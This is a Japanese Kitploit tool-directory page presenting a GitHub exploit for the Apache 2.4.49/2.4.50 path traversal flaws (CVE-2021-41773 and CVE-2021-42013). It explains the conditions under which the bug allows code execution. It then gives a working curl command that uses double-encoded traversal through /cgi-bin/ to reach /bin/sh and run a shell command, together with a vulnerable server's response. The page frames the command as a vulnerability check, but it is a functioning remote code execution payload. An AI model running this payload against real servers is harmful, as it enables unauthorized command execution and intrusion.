Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-41773 — Apacheサーバー向けのリモートコード実行エクスプロイト。影響を受けるバージョン: Apache 2.4.49、Apache 2.4.50 | Kitploit
ツール/GitHubGitHub/mr-exo/cve-2021-41773
偵察ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubmr-exo/cve-2021-41773

CVE-2021-41773

Apacheサーバー向けのリモートコード実行エクスプロイト。影響を受けるバージョン: Apache 2.4.49、Apache 2.4.50

リポジトリを見る
114年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Apache 2.4.49 (CVE-2021-41773) および 2.4.50 (CVE-2021-42013) の両方に対するRCEエクスプロイト:

私見では、このRCEに対して脆弱なのは「特別な」構成のみです。
これまで見てきた「任意ファイル読み取り」エクスプロイトについても同様です。

両CVEは実際にはほぼ同じパストラバーサル脆弱性です(2つ目は1つ目に対する不完全な修正です)。
パストラバーサルはマップされたURI(例: Apacheディレクティブの「Alias」や「ScriptAlias」)からのみ機能します。DocumentRootのみでは不十分です。

"/cgi-bin/" はデフォルト(ScriptAlias)でマップされるため、パストラバーサル文字列の前にこれが使用されているのです。
さらに、ScriptAliasは指定されたディレクトリ内のすべてのコンテンツを(Apacheにとって)Execとしてマークします(ファイル拡張子に関係なく)。

要件:

1/ mod_cgiが有効であること(デフォルトではないが簡単)
2/ ターゲットバイナリが+xであること(/bin/shではデフォルト)
3/ Apacheに対して/binまたは/への権限が付与されていること(デフォルトではなく、困難/非現実的)\

サーバーが脆弱かどうかを確認する:

curl 'http://IPADDR/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'

脆弱なサーバーからのレスポンス:

uid=1(daemon) gid=1(daemon) groups=1(daemon)

ツールをダウンロード